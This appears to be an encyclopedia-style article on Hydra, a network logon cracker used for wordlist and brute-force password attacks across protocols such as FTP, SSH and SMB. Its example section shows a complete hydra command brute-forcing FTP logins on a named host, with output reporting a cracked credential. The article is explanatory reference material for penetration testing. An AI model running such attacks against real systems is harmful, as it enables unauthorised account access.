Hydra (software)


Hydra is a parallelized network logon cracker. Hydra works by using different approaches of generating possible passwords, such as wordlist attacks, brute-force attacks and others. Hydra is commonly used by penetration testers together with a program named crunch, which is used to generate wordlists. Hydra is then used to test the attacks using the wordlists that crunch created.
Hydra is set to be updated over time as more services become supported. The creator of Hydra publishes his work in repositories like GitHub.

Supported protocols

Hydra supports many common login protocols like forms on websites, FTP, SMB, POP3, IMAP, MySQL, VNC, SSH and others.

Examples

Here is a sample output in a Debian environment.

$ hydra -L names -P pws ftp://wanne.t-8ch.de
Hydra v7.3 2012 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra starting at 2013-02-09 00:54:40
16 tasks, 1 server, 516 login tries, ~32 tries per task
attacking service ftp on port 21
host: 78.47.172.244 login: john password: passwd
attack finished for wanne.t-8ch.de
1 of 1 target successfully completed, 1 valid password found
Hydra finished at 2013-02-09 00:54:51